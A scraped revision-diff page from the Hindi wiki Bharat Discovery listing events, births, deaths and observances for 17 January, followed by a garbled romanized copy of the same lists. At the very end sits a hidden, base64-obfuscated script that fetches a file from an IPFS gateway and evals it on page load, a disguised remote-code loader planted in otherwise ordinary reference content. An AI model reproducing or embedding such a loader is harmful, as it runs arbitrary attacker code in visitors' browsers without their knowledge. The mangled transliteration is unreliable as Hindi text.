Difference between revisions of "17 जनवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(9 intermediate revisions by 2 users not shown)
Line 4: Line 4:
  
 
==17 जनवरी की महत्त्वपूर्ण घटनाएँ==
 
==17 जनवरी की महत्त्वपूर्ण घटनाएँ==
* 1595 - [[फ्रांस]] के राजा हेनरी चतुर्थ ने स्पेन के खिलाफ युद्ध की घोषणा की।
+
* [[2020]] - [[भारतीय अंतरिक्ष अनुसंधान संगठन]] (इसरो) ने यूरोपीय अंतरिक्ष एजेंसी से एरियन-5 प्रक्षेपण यान के माध्यम से संचार उपग्रह जीसैट-30 प्रक्षेपित कर किया। यह प्रक्षेपण भारतीय समयानुसार 2 बजकर 35 मिनट पर किया गया। यह इसरो का साल [[2020]] का पहला मिशन था। प्रक्षेपण के लगभग 38 मिनट 25 सेकंड बाद सैटेलाइट कक्षा में स्थापित हो गया।
* 1601 - मुग़ल बादशाह [[अकबर]] ने [[असीरगढ़]] के अभेद किले में प्रवेश किया।
+
**केंद्रीय गृह मंत्रालय ने आतंकवाद, नक्सली हिंसा या सांप्रदायिक दंगा पीड़ितों को सरकारी सहायता पाने हेतु '[[आधार कार्ड|आधार]]' को अनिवार्य कर दिया।
** फ्रांस ने स्पेन के साथ समझौता किया जिसके तहत फ्रांस को ब्रीस, बगेस वोल्रोमेय तथा गेक्स इलाका प्राप्त हुआ।
+
* [[2013]] - इराक में सिलसिलेवार बम धमाकों में 33 लोग मारे गये।
* [[1757]] - [[जर्मनी]] ने प्रूशिया के ख़िलाफ़ युद्ध की घोषणा की।
+
* [[2010]]- [[भारत]] के उच्चतम न्यायालय ने ग़ैरक़ानूनी तरीक़े से हमला किए जाने की स्थिति में आत्मरक्षा के अधिकार की प्रो-ऐक्टिव परिभाषा देते हुए कहा है कि क़ानून का पालन करने वाले लोगों को कायर बनकर रहने की ज़रूरत नहीं है। उसकी दो सदस्यीय खंडपीठ ने आत्मरक्षा के अधिकार की 10 सूत्रीय निर्देश तय करते हुए कहा कि इन परिस्थितियों में किसी व्यक्ति को अपराधी नहीं बनाया जा सकेगा, भले ही उसने हमलावर को जानलेवा क्षति पहुँचायी हो।
* [[1852]] - [[ब्रिटेन]] ने दक्षिण [[अफ्रीका]] के ट्रांसवाल की स्वतंत्रता को मान्यता दी।
+
* [[2009]]- भारतीय ओलम्पिक संघ के महासचिव रणधीरसिंह ने अपने पद से इस्तीफ़ा दिया।
* [[1863]] - अमेरिकी राज्य वर्जीनिया में गृह युद्ध।
 
* [[1895]] - फ्रांसीसी राष्ट्रपति कैसिमिर पेरियर ने इस्तीफा दिया।
 
* [[1913]] - रेमंड प्वाइनकेयर फ्रांस के [[राष्ट्रपति]] चुने गये।
 
* [[1941]] - [[सुभाषचन्द्र बोस]] ब्रिटिश पहरे से चुपचाप ढंग से निकलकर [[जर्मनी]] के लिए रवाना हुए।
 
* [[1945]] - द्वितीय विश्वयुद्ध की समाप्ति के दिनों में सोवियत सेना का [[पोलैण्ड]] की राजधानी वारसा में आगमन।
 
* [[1946]] - संयुक्त राष्ट्र सुरक्षा परिषद की पहली बैठक हुई।
 
* [[1948]] - नीदरलैंड तथा इंडोनेशिया संघर्ष विराम पर सहमत हुए।
 
* [[1961]] - जनवादी कोंगो के [[प्रधानमंत्री]] पेट्रिस लुमुम्बा की देश के नये सैन्य शासकों ने हत्या कर दी।
 
* [[1976]] - यूरोपीय स्पेस एजेंसी ने हरमस रॉकेट लांच किया।
 
* [[1979]] - सोवियत संघ ने परमाणु परीक्षण किया।
 
* [[1980]] - नासा ने फ्लाटसटकोम-3 लांच किया।
 
* [[1985]] - भारतीय क्रिकेटर अजहरुद्दीन ने इंगलैंड के खिलाफ दूसरा टेस्ट शतक लगाया।
 
* [[1987]] - टाटा फुटबॉल अकादमी खुला।
 
* [[1989]] - कर्नल जेके बजाज उत्तरी ध्रुव पर पहुंचने वाले पहले भारतीय बने।
 
* [[1995]] - [[जापान]] में 7.2 तीव्रता के [[भूकंप]] में 5,372 लोगों की मौत।
 
* [[2002]] - अमेरिकी विदेश मंत्री कॉलिन पावेल भारत पहुँचे, आतंकवाद के मुद्दे पर भारत के रुख़ का समर्थन किया।
 
* [[2007]] - आस्ट्रेलिया के क्रिकेटर माइकल बेवन ने अंतर्राष्ट्रीय क्रिकेट से सन्न्यास लिया।
 
 
* [[2008]]-  
 
* [[2008]]-  
 
**केन्द्र सरकार ने विकलांगों को नौकरियां देने के लिए 1800 करोड़ रुपये की एक योजना को मंज़ूरी प्रदान की।
 
**केन्द्र सरकार ने विकलांगों को नौकरियां देने के लिए 1800 करोड़ रुपये की एक योजना को मंज़ूरी प्रदान की।
 
**मेडागास्कर में हिन्द महासागर के ताड़ के पेड़ की नई प्रजाति मिली।  
 
**मेडागास्कर में हिन्द महासागर के ताड़ के पेड़ की नई प्रजाति मिली।  
* [[2009]]- भारतीय ओलम्पिक संघ के महासचिव रणधीरसिंह ने अपने पद से इस्तीफ़ा दिया।
+
* [[2007]] - आस्ट्रेलिया के क्रिकेटर माइकल बेवन ने अंतर्राष्ट्रीय क्रिकेट से सन्न्यास लिया।
* [[2010]]- [[भारत]] के उच्चतम न्यायालय ने ग़ैरक़ानूनी तरीक़े से हमला किए जाने की स्थिति में आत्मरक्षा के अधिकार की प्रो-ऐक्टिव परिभाषा देते हुए कहा है कि क़ानून का पालन करने वाले लोगों को कायर बनकर रहने की ज़रूरत नहीं है। उसकी दो सदस्यीय खंडपीठ ने आत्मरक्षा के अधिकार की 10 सूत्रीय निर्देश तय करते हुए कहा कि इन परिस्थितियों में किसी व्यक्ति को अपराधी नहीं बनाया जा सकेगा, भले ही उसने हमलावर को जानलेवा क्षति पहुँचायी हो।
+
* [[2002]] - अमेरिकी विदेश मंत्री कॉलिन पावेल भारत पहुँचे, आतंकवाद के मुद्दे पर भारत के रुख़ का समर्थन किया।
* [[2013]] - इराक में सिलसिलेवार बम धमाकों में 33 लोग मारे गये।
+
* [[1995]] - [[जापान]] में 7.2 तीव्रता के [[भूकंप]] में 5,372 लोगों की मौत।
 +
* [[1989]] - कर्नल जेके बजाज उत्तरी ध्रुव पर पहुंचने वाले पहले भारतीय बने।
 +
* [[1987]] - टाटा फुटबॉल अकादमी खुला।
 +
* [[1985]] - भारतीय क्रिकेटर अजहरुद्दीन ने इंगलैंड के खिलाफ दूसरा टेस्ट शतक लगाया।
 +
* [[1980]] - नासा ने फ्लाटसटकोम-3 लांच किया।
 +
* [[1979]] - सोवियत संघ ने परमाणु परीक्षण किया।
 +
* [[1976]] - यूरोपीय स्पेस एजेंसी ने हरमस रॉकेट लांच किया।
 +
* [[1961]] - जनवादी कोंगो के [[प्रधानमंत्री]] पेट्रिस लुमुम्बा की देश के नये सैन्य शासकों ने हत्या कर दी।
 +
* [[1948]] - नीदरलैंड तथा इंडोनेशिया संघर्ष विराम पर सहमत हुए।
 +
* [[1946]] - संयुक्त राष्ट्र सुरक्षा परिषद की पहली बैठक हुई।
 +
* [[1945]] - द्वितीय विश्वयुद्ध की समाप्ति के दिनों में सोवियत सेना का [[पोलैण्ड]] की राजधानी वारसा में आगमन।
 +
* [[1941]] - [[सुभाषचन्द्र बोस]] ब्रिटिश पहरे से चुपचाप ढंग से निकलकर [[जर्मनी]] के लिए रवाना हुए।
 +
* [[1913]] - रेमंड प्वाइनकेयर फ्रांस के [[राष्ट्रपति]] चुने गये।
 +
* [[1895]] - फ्रांसीसी राष्ट्रपति कैसिमिर पेरियर ने इस्तीफा दिया।
 +
* [[1863]] - अमेरिकी राज्य वर्जीनिया में गृह युद्ध।
 +
* [[1852]] - [[ब्रिटेन]] ने दक्षिण [[अफ्रीका]] के ट्रांसवाल की स्वतंत्रता को मान्यता दी।
 +
* [[1757]] - [[जर्मनी]] ने प्रूशिया के ख़िलाफ़ युद्ध की घोषणा की।
 +
* 1601 - मुग़ल बादशाह [[अकबर]] ने [[असीरगढ़]] के अभेद किले में प्रवेश किया।
 +
** फ्रांस ने स्पेन के साथ समझौता किया जिसके तहत फ्रांस को ब्रीस, बगेस वोल्रोमेय तथा गेक्स इलाका प्राप्त हुआ।
 +
* 1595 - [[फ्रांस]] के राजा हेनरी चतुर्थ ने स्पेन के खिलाफ युद्ध की घोषणा की।
  
 
==17 जनवरी को जन्मे व्यक्ति==
 
==17 जनवरी को जन्मे व्यक्ति==
* [[1863]] - आधुनिक रंगमंच को अपनी यथार्थवादी शैली से नया रूप देने वाले महान् रूसी रंगकर्मी 'कोंस्तेंतिन स्तानिस्लावस्की' का जन्म हुआ।
+
* [[1996]] - [[अब्दुल्ला अबुबकर]] - भारतीय एथलीट हैं जो ट्रिपल जंप में प्रतिस्पर्धा करते हैं।
* [[1888]] - [[बाबू गुलाबराय]] - [[भारत]] के प्रसिद्ध साहित्यकार, निबन्धकार और व्यंग्यकार।
+
* [[1945]] - [[जावेद अख़्तर]], प्रसिद्ध कवि, गीतकार।
* [[1908]] - [[एल. वी. प्रसाद]] - [[भारतीय सिनेमा]] के सफल फ़िल्मकार, निर्माता-निर्देशक और अभिनेता।
+
* [[1941]] -[[महावीर सरन जैन]], प्रसिद्ध लेखक।
* [[1920]] - तुर्की के क्रांतिकारी कवि 'नाजिम हिकमत' का जन्म हुआ।
+
* [[1930]] - [[अरविंद कुमार]], माधुरी और सर्वोत्तम पत्रिकाओं के प्रथम सम्पादक।
 
* [[1923]] - [[रांगेय राघव]] [[हिन्दी]] [[साहित्यकार]] का जन्म।
 
* [[1923]] - [[रांगेय राघव]] [[हिन्दी]] [[साहित्यकार]] का जन्म।
 +
* [[1920]] -  नाजिम हिकमत - तुर्की के क्रांतिकारी कवि  का जन्म हुआ।
 +
* [[1918]] - [[कमाल अमरोही]], प्रसिद्ध फ़िल्म निर्माता-निर्देशक।
 
* [[1917]] - [[एम जी रामचंन्द्रन]] [[राजनेता]] एवं [[अभिनेता]] का जन्म।
 
* [[1917]] - [[एम जी रामचंन्द्रन]] [[राजनेता]] एवं [[अभिनेता]] का जन्म।
* [[1941]] -[[महावीर सरन जैन]], प्रसिद्ध लेखक।
+
* [[1908]] - [[एल. वी. प्रसाद]] - [[भारतीय सिनेमा]] के सफल फ़िल्मकार, निर्माता-निर्देशक और अभिनेता।
* [[1945]] - [[पटकथा लेखक]] और [[हिन्दी]] फ़िल्मों के गीतकार [[जावेद अख़्तर]] का जन्म।
 
* [[1930]] - [[अरविंद कुमार]], माधुरी और सर्वोत्तम पत्रिकाओं के प्रथम सम्पादक 
 
* [[1918]] - [[कमाल अमरोही]], प्रसिद्ध फ़िल्म निर्माता-निर्देशक
 
* [[1945]] - [[जावेद अख़्तर]], प्रसिद्ध कवि, गीतकार
 
 
* [[1905]] - [[डी. आर. कापरेकर]] - भारतीय गणितज्ञ।
 
* [[1905]] - [[डी. आर. कापरेकर]] - भारतीय गणितज्ञ।
 +
* [[1888]] - [[बाबू गुलाबराय]] - [[भारत]] के प्रसिद्ध साहित्यकार, निबन्धकार और व्यंग्यकार।
 +
* [[1986]] - [[निसिथ प्रमाणिक]] - [[भारतीय जनता पार्टी]] के राजनीतिज्ञ हैं जो [[बंगाल]] के [[कूचबिहार]] से सांसद हैं।
 +
* [[1863]] -  'कोंस्तेंतिन स्तानिस्लावस्की - आधुनिक रंगमंच को अपनी यथार्थवादी शैली से नया रूप देने वाले महान् रूसी रंगकर्मी का जन्म हुआ।
  
 
==17 जनवरी को हुए निधन==
 
==17 जनवरी को हुए निधन==
 +
* [[2022]] - [[बिरजू महाराज]] - प्रसिद्ध शास्त्रीय नृत्य कलाकारों में से एक थे।
 +
* [[2021]] - [[ग़ुलाम मुस्तफ़ा ख़ान]] - [[भारतीय शास्त्रीय संगीत]] गायक थे।
 +
* [[2020]] - [[बापू नादकर्णी]] - पूर्व भारतीय [[क्रिकेट]] खिलाड़ी थे।
 
* [[2010]]- [[भारत]] के प्रसिद्ध मार्क्सवादी राजनीतिज्ञ [[ज्योति बसु]] का निधन।
 
* [[2010]]- [[भारत]] के प्रसिद्ध मार्क्सवादी राजनीतिज्ञ [[ज्योति बसु]] का निधन।
 
*  [[2014]] - [[सुचित्रा सेन]], प्रसिद्ध फ़िल्म [[अभिनेत्री]]
 
*  [[2014]] - [[सुचित्रा सेन]], प्रसिद्ध फ़िल्म [[अभिनेत्री]]
 
* [[1951]] - [[ज्योति प्रसाद अग्रवाल]] - [[असम]] के प्रसिद्ध साहित्यकार, स्वतंत्रता सेनानी तथा फ़िल्म निर्माता।
 
* [[1951]] - [[ज्योति प्रसाद अग्रवाल]] - [[असम]] के प्रसिद्ध साहित्यकार, स्वतंत्रता सेनानी तथा फ़िल्म निर्माता।
 
* [[1930]] - [[गौहर जान]] - भारतीय गायिका और नर्तकी थीं।
 
* [[1930]] - [[गौहर जान]] - भारतीय गायिका और नर्तकी थीं।
 +
* 1582 - [[बेगा बेगम]] - [[मुग़ल]] [[हुमायूँ|बादशाह हुमायूँ]] की दूसरी पत्नी और [[अकबर]] की सोतेली माँ थीं।
  
 
==17 जनवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==17 जनवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
* अंतर्राष्ट्रीय फ़िल्म समारोह दिवस (10 दिवसीय)
 
* अंतर्राष्ट्रीय फ़िल्म समारोह दिवस (10 दिवसीय)
* [[राष्ट्रीय सड़क सुरक्षा सप्ताह]]
+
* [[राष्ट्रीय सड़क सुरक्षा सप्ताह|राष्ट्रीय सड़क सुरक्षा सप्ताह 11 जनवरी- 17 जनवरी तक]]
  
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==

Latest revision as of 09:23, 13 August 2022


gregori kailandar ke anusar 17 janavari varsh ka 17 vaan din hai. sal mean abhi aur 348 din shesh haian. (lip varsh mean 349 din)

17 janavari ki mahattvapoorn ghatanaean

  • 2020 - bharatiy aantariksh anusandhan sangathan (isaro) ne yooropiy aantariksh ejeansi se eriyan-5 prakshepan yan ke madhyam se sanchar upagrah jisait-30 prakshepit kar kiya. yah prakshepan bharatiy samayanusar 2 bajakar 35 minat par kiya gaya. yah isaro ka sal 2020 ka pahala mishan tha. prakshepan ke lagabhag 38 minat 25 sekand bad saitelait kaksha mean sthapit ho gaya.
    • keandriy grih mantralay ne atankavad, naksali hiansa ya saanpradayik danga pi ditoan ko sarakari sahayata pane hetu 'adhar' ko anivary kar diya.
  • 2013 - irak mean silasilevar bam dhamakoan mean 33 log mare gaye.
  • 2010- bharat ke uchchatam nyayalay ne gairaqanooni tariqe se hamala kie jane ki sthiti mean atmaraksha ke adhikar ki pro-aiktiv paribhasha dete hue kaha hai ki qanoon ka palan karane vale logoan ko kayar banakar rahane ki zaroorat nahian hai. usaki do sadasyiy khandapith ne atmaraksha ke adhikar ki 10 sootriy nirdesh tay karate hue kaha ki in paristhitiyoan mean kisi vyakti ko aparadhi nahian banaya ja sakega, bhale hi usane hamalavar ko janaleva kshati pahuanchayi ho.
  • 2009- bharatiy olampik sangh ke mahasachiv ranadhirasianh ne apane pad se istifa diya.
  • 2008-
    • kendr sarakar ne vikalaangoan ko naukariyaan dene ke lie 1800 karo d rupaye ki ek yojana ko manzoori pradan ki.
    • medagaskar mean hind mahasagar ke ta d ke pe d ki nee prajati mili.
  • 2007 - astreliya ke kriketar maikal bevan ne aantarrashtriy kriket se sannyas liya.
  • 2002 - ameriki videsh mantri k aaulin pavel bharat pahuanche, atankavad ke mudde par bharat ke rukh ka samarthan kiya.
  • 1995 - japan mean 7.2 tivrata ke bhookanp mean 5,372 logoan ki maut.
  • 1989 - karnal jeke bajaj uttari dhruv par pahuanchane vale pahale bharatiy bane.
  • 1987 - tata phutab aaul akadami khula.
  • 1985 - bharatiy kriketar ajaharuddin ne iangalaiand ke khilaph doosara test shatak lagaya.
  • 1980 - nasa ne phlatasatakom-3 laanch kiya.
  • 1979 - soviyat sangh ne paramanu parikshan kiya.
  • 1976 - yooropiy spes ejeansi ne haramas r aauket laanch kiya.
  • 1961 - janavadi koango ke pradhanamantri petris lumumba ki desh ke naye sainy shasakoan ne hatya kar di.
  • 1948 - nidaralaiand tatha iandoneshiya sangharsh viram par sahamat hue.
  • 1946 - sanyukt rashtr suraksha parishad ki pahali baithak huee.
  • 1945 - dvitiy vishvayuddh ki samapti ke dinoan mean soviyat sena ka polaind ki rajadhani varasa mean agaman.
  • 1941 - subhashachandr bos british pahare se chupachap dhang se nikalakar jarmani ke lie ravana hue.
  • 1913 - remand pvainakeyar phraans ke rashtrapati chune gaye.
  • 1895 - phraansisi rashtrapati kaisimir periyar ne istipha diya.
  • 1863 - ameriki rajy varjiniya mean grih yuddh.
  • 1852 - briten ne dakshin aphrika ke traansaval ki svatantrata ko manyata di.
  • 1757 - jarmani ne prooshiya ke khilaf yuddh ki ghoshana ki.
  • 1601 - mugal badashah akabar ne asiragadh ke abhed kile mean pravesh kiya.
    • phraans ne spen ke sath samajhauta kiya jisake tahat phraans ko bris, bages volromey tatha geks ilaka prapt hua.
  • 1595 - phraans ke raja henari chaturth ne spen ke khilaph yuddh ki ghoshana ki.

17 janavari ko janme vyakti

17 janavari ko hue nidhan

17 janavari ke mahattvapoorn avasar evan utsav

bahari k diyaan


sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>